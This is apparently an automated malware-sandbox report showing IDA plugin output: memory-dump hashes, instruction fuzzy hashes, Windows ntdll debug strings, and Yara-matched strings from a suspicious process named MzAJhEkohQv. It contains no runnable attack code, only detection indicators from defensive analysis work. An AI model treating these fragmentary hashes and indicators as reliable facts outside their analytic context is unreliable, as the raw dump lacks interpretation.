                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                • Instruction ID: d4dfb17f0bd0fae3bf31009b458e6813a40ffb7c2478cd522ab5c694a9ed53a1
                                                • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                • Instruction Fuzzy Hash: 14D0C939312D80CFD206CB5CC890B0533A4FF44B84FC10490E801CB722D62CD940CA00
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                • Instruction ID: a5b20432f99eab57acea7afe570b681167b2189c0da69204dc0009b49f9603b5
                                                • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                • Instruction Fuzzy Hash: E9C01232290648AFC722AA98DD01F027BA9EBA8B00F000021F2048B670C671E820EA88
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction ID: 3c98597dc75bb6a4641fe48f40a37d7a06bb1cf4b3f43de583a26d026ef8f647
                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                • Instruction Fuzzy Hash: A7D0123610064CEFCB01DF40C890D6A772AFFC8710F108419FD19076108A71ED62DA54
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                • Instruction ID: cb85270d3de0be1aea913bb5a04bbe9208dccc888ceb72292e0c74be21da8d7e
                                                • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                • Instruction Fuzzy Hash: 94C08CB81413C06BEB2A5B00C910B283654AFE0F49F80029CAA081D4A1CBABD8218209
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                • Instruction ID: 00e37b87a627f212308d9c244741098911c23bd40b6fbc371541d134e9cff33b
                                                • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                • Instruction Fuzzy Hash: 20C04839781A40CFEF19CB2AD284F097BE8BF84B80F5508D0EC05CBB21E664EC50CA12
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a3e62c67295e6120b97446b041e42cb7889dcf5be89e7a674ccdd890c6bd907
                                                • Instruction ID: 37b37788e0f51a2e9b84de63970a178284c2ba6f7ae2ca757e961f73c6498739
                                                • Opcode Fuzzy Hash: 6a3e62c67295e6120b97446b041e42cb7889dcf5be89e7a674ccdd890c6bd907
                                                • Instruction Fuzzy Hash: 7B900231605500139D4075595B8459650055FE0301B51D416E1424614CCA24895A6361
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dec838bce49ac29c65dfda434498ef1665cb680a2ea64639791fd4e98db2c8e3
                                                • Instruction ID: 60e08483b30dbfc9d38f00e4885270e93194ecdfa8609239e208492360005f87
                                                • Opcode Fuzzy Hash: dec838bce49ac29c65dfda434498ef1665cb680a2ea64639791fd4e98db2c8e3
                                                • Instruction Fuzzy Hash: BA900261601200434D4075595B0445670055FE1301391D51AA1554620CC6288859A369
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83386cc24125928074ae9bc5cbea95c85531bf774579b1ac942476fc7767cf0b
                                                • Instruction ID: 9772df1412ea6d9a0e933136f0d67564af61c49f2e7ffbdb2732c3eb13b95674
                                                • Opcode Fuzzy Hash: 83386cc24125928074ae9bc5cbea95c85531bf774579b1ac942476fc7767cf0b
                                                • Instruction Fuzzy Hash: 23900225221100030D45A959170455B14455FD6351391D41AF2416650CC63188696321
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08480cde80f2d2b650321d6107f0c607da1abda4021e7ceca63cefdc98a91b5c
                                                • Instruction ID: 27dbb7f51d86a83951a87c00b46137688a9e9dd85777cf202d94e6dffdaf4269
                                                • Opcode Fuzzy Hash: 08480cde80f2d2b650321d6107f0c607da1abda4021e7ceca63cefdc98a91b5c
                                                • Instruction Fuzzy Hash: 4C90023160510803DD507559571479610054FD0301F51D416A1024714DC7658A5977A1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 649c7bda294df0ace641e61921981c77e4e6e768f35db2d15defc4216cc1d724
                                                • Instruction ID: f5603a792c7fec38475f6c3f49219e663ce6de2386a4ca6c0b377f9994e14785
                                                • Opcode Fuzzy Hash: 649c7bda294df0ace641e61921981c77e4e6e768f35db2d15defc4216cc1d724
                                                • Instruction Fuzzy Hash: CC90023120110803DD0465595B046D610054FD0301F51D416A7024715ED67588957231
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e31a6553df4b3de37196ef3d722e4b441eb44a562137bf5b5ef7345b9b63b632
                                                • Instruction ID: e14d659b44d195cb235e6070d2f1d10aa5bfa2e15deb3a0eeea1c6388f7a793e
                                                • Opcode Fuzzy Hash: e31a6553df4b3de37196ef3d722e4b441eb44a562137bf5b5ef7345b9b63b632
                                                • Instruction Fuzzy Hash: 9C900261202100034D0575595714666500A4FE0201B51D426E2014650DC53588957225
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a8497db36afe66546149747517d4a08c9b0b373753cfb6242dbb16d376f6c26
                                                • Instruction ID: 98a84d2b771d338342f0b6f224f8ce132e666f0573f6e86d0c2069faf90202c9
                                                • Opcode Fuzzy Hash: 4a8497db36afe66546149747517d4a08c9b0b373753cfb6242dbb16d376f6c26
                                                • Instruction Fuzzy Hash: 9E90023120514843DD4075595704A9610154FD0305F51D416A1064754DD6358D59B761
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0aa4edebaf8abc435baf7b0e5d9491409145a77978dc95ec3b036ed7ad1a895
                                                • Instruction ID: 4d4eaf3c142132f93b501b7e092e9c9a77f3cb10f813673dcb53b575a801f138
                                                • Opcode Fuzzy Hash: b0aa4edebaf8abc435baf7b0e5d9491409145a77978dc95ec3b036ed7ad1a895
                                                • Instruction Fuzzy Hash: 9990023120110803DD807559570469A10054FD1301F91D41AA1025714DCA258A5D77A1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a46c076032fbbccc76e7a2b353edf217efe03c25aa99329b59fa0045fb2c611
                                                • Instruction ID: 51b6e63abcf8e352b853852028483d5fab31202cf54aea19429d29e5c9524070
                                                • Opcode Fuzzy Hash: 4a46c076032fbbccc76e7a2b353edf217efe03c25aa99329b59fa0045fb2c611
                                                • Instruction Fuzzy Hash: 0C90022160510403DD407559671875610154FD0201F51E416A1024614DC6698A5977A1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d860a052b37d2c071ae9f0d058bd4455d3cdf2b97cd1cabf41b84916676ab63
                                                • Instruction ID: bcaecd45bc73e4bcf021e49bf5497e4625386d0775cd1b9326c578b4a8cc2ec4
                                                • Opcode Fuzzy Hash: 8d860a052b37d2c071ae9f0d058bd4455d3cdf2b97cd1cabf41b84916676ab63
                                                • Instruction Fuzzy Hash: B090023120110403DD006999670869610054FE0301F51E416A6024615EC67588957231
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd

                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP:

                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 326D4592
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 326D4530
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 326D4460
                                                • Execute=1, xrefs: 326D451E
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 326D454D
                                                • ExecuteOptions, xrefs: 326D44AB
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 326D4507
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions

                                                Strings
                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 326C78F3
                                                • Actx , xrefs: 326C7819, 326C7880
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326C77E2
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326C7807
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 326C77DD, 326C7802
                                                • SsHd, xrefs: 3267A304
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd

                                                APIs
                                                Strings
                                                • GsHd, xrefs: 3267D794
                                                • Actx , xrefs: 326C9315
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326C9153
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 326C9178
                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 326C9372
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 326C914E, 326C9173
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                APIs
                                                Strings
                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 326B9843
                                                • LdrpLoadShimEngine, xrefs: 326B984A, 326B988B
                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 326B9885
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326B9854, 326B9895
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-3224558752
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                • API String ID: 3446177414-1222099010
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
                                                • API String ID: 3446177414-1194432280
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 3446177414-3610490719
                                                APIs
                                                Strings
                                                • LdrpCheckModule, xrefs: 326C9F24
                                                • minkernel\ntdll\ldrinit.c, xrefs: 326C9F2E
                                                • Failed to allocated memory for shimmed module list, xrefs: 326C9F1C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-161242083
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: /op2
                                                • API String ID: 3446177414-2104935455
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                • String ID:
                                                • API String ID: 4281723722-0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$Flst
                                                • API String ID: 0-758220159
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, Offset: 32630000, based on PE: true
                                                • Associated: 00000003.00000002.674222220944.0000000032759000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_32630000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: e2$me2
                                                • API String ID: 3446177414-2646222625
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $*$+'$+D$7-$7O$:$;j$=$C*$C;$F($O$R$h$i$p3$q$r$+
                                                • API String ID: 0-607593665
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 6$O$S$\$s
                                                • API String ID: 0-3854637164
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: N/
                                                • API String ID: 0-2230471981
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: xH
                                                • API String ID: 0-3728222371
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6bf1b2a8853745f1ac70e4228c92ac0ca62aea8f3a6c9f384016331ed9fd14c7
                                                • Instruction ID: 8f37dc0ac642966acf58ef71d26654cbdf1be8c84ac0de9f34c8228ec723cd95
                                                • Opcode Fuzzy Hash: 6bf1b2a8853745f1ac70e4228c92ac0ca62aea8f3a6c9f384016331ed9fd14c7
                                                • Instruction Fuzzy Hash: 201190B56013596BD710EFA8CC45FAFB7ADEBC5300F004509FD19AB281E7716911CBA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa928f1e22e57b770b8acdc88e85465f077b380a9d82635e80c06c37553662f8
                                                • Instruction ID: 3976f898b3abf790052e8bcf3f241f6df365e4d136d70121ab1d39395e3103ce
                                                • Opcode Fuzzy Hash: fa928f1e22e57b770b8acdc88e85465f077b380a9d82635e80c06c37553662f8
                                                • Instruction Fuzzy Hash: 56118EB5A413496BD710EF68CC45FAFB3ADEBC5300F008509FD19AB240D7716915CBA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_38b0000_MzAJhEkohQv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf618fcd25cc473fcddc84176ffd31cbd3963ce1d315d77fef777b479c4743f0
